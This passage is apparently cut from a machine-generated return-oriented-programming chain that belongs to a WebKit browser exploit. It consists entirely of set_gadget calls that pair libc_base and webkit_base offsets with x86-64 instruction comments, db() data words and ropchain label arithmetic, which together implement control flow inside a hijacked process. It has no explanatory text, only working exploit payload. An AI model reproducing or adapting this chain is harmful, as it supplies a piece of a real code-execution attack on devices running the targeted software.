//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5792: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+298536, //L5796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+298520, //L5795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5794: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5795: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5796: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+298600, //L5797 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5797: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5799: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+298680, //L5800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5800: db([0, 0]); // 0x0 //L5767: set_gadgets([ libc_base+764760, //pop rsi ropchain+298728, //L5802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5802: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5804: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+298848, //L5807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+298832, //L5805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5805: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5807: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+299024, //L5810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+299040, //L5811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+298992, //L5808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+299008, //L5809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5808: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5809: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5810: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L5811: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+299136, //L5813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+299120, //L5812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5812: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5813: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5814: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5815: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5816: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+299336, //L5818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5818: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+299392, //L5819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5819: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+299528, //L5823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+299512, 
//L5822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5821: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5822: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5823: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+299648, //L5826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+299616, //L5824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5824: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5825: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5826: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+299784, //L5828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+299800, //L5829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+299768, //L5827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5829: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+299960, //L5834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+299976, //L5835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+299912, //L5831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5831: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5832: db([0, 0]); // 
0x0 set_gadget(libc_base+763368,); //pop rcx //L5833: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L5834: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5835: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+300096, //L5836+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+300088, //L5836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5836: db([0, 0]); // 0x0 set_gadgets([ ropchain+300112, //L5836+24 ropchain+300512, //L5830 libc_base+764760, //pop rsi ropchain+300152, //L5837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5837: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5839: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+300272, //L5842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+300256, //L5840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5840: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5842: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+300416, //L5845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+300432, //L5846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+300384, //L5843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5843: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L5844: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5845: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5846: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+300504, //L5847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5847: db([0, 0]); // 0x0 //L5830: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+300632, //L5850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+300648, //L5851 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+300616, //L5849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5849: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5850: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5851: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+300760, //L5853 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+300808, //L5856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+300776, //L5854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5853: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5854: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5855: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5856: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+300920, 
//L5857+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+300912, //L5857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5857: db([0, 0]); // 0x0 set_gadgets([ ropchain+300936, //L5857+24 ropchain+312224, //L5852 //L5858: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5859: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5861: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+301072, //L5864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+301056, //L5862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5862: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5864: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+301216, //L5867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+301184, //L5865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+301200, //L5866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5867: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+301296, //L5868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5868: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5870: db([64, 0]); // 0x40 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+301416, //L5873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+301400, //L5871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5871: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5873: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+301528, //L5874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+301560, //L5876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+301544, //L5875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5874: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5875: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5876: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+301728, //L5879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+301696, //L5877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+301712, //L5878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5877: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5878: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5879: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+428453, //mov rax, rdx libc_base+764760, //pop 
rsi ropchain+301912, //L5883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+301880, //L5881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+301896, //L5882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5880: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5881: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5882: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5883: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+301968, //L5885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5885: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+302096, //L5887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+302112, //L5888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+302080, //L5886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5886: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5887: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5888: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+302192, //L5889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+302208, //L5890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5889: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5890: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi 
ropchain+302296, //L5891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+302312, //L5893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5893: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5894: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5896: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+302472, //L5899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+302456, //L5897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5897: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5899: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+302632, //L5903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+302600, //L5901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+302616, //L5902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5900: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5901: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5902: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5903: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+302688, //L5905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi 
]); //L5905: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+302816, //L5907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+302832, //L5908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+302800, //L5906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5906: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5907: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5908: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+302992, //L5912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+302960, //L5910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+302976, //L5911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5909: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5910: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5911: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5912: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+303048, //L5914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5914: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+303176, //L5916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+303192, //L5917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+303160, //L5915 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5915: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5917: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+303272, //L5918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+303288, //L5919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5918: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5919: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+303384, //L5921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+303368, //L5920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5921: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+303464, //L5922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5922: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5923: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L5924: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+303608, //L5925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+303640, //L5927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+303624, //L5926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L5925: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5926: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5927: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+303816, //L5929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+303832, //L5930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+303800, //L5928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5928: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5929: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5930: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+303944, //L5932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+303992, //L5935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+303960, //L5933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5932: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5933: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5934: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5935: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+304104, //L5936+8 libc_base+501454, //add rax, rsi libc_base+501611, 
//mov rax, [rax] libc_base+764760, //pop rsi ropchain+304096, //L5936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5936: db([0, 0]); // 0x0 set_gadgets([ ropchain+304120, //L5936+24 ropchain+305256, //L5931 libc_base+759608 //pop rax ]); //L5937: db([48, 0]); // 0x30 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+304208, //L5938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5938: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5940: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+304328, //L5943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+304312, //L5941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5941: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5943: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+304488, //L5947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+304456, //L5945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+304472, //L5946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5944: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5945: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5946: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5947: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi 
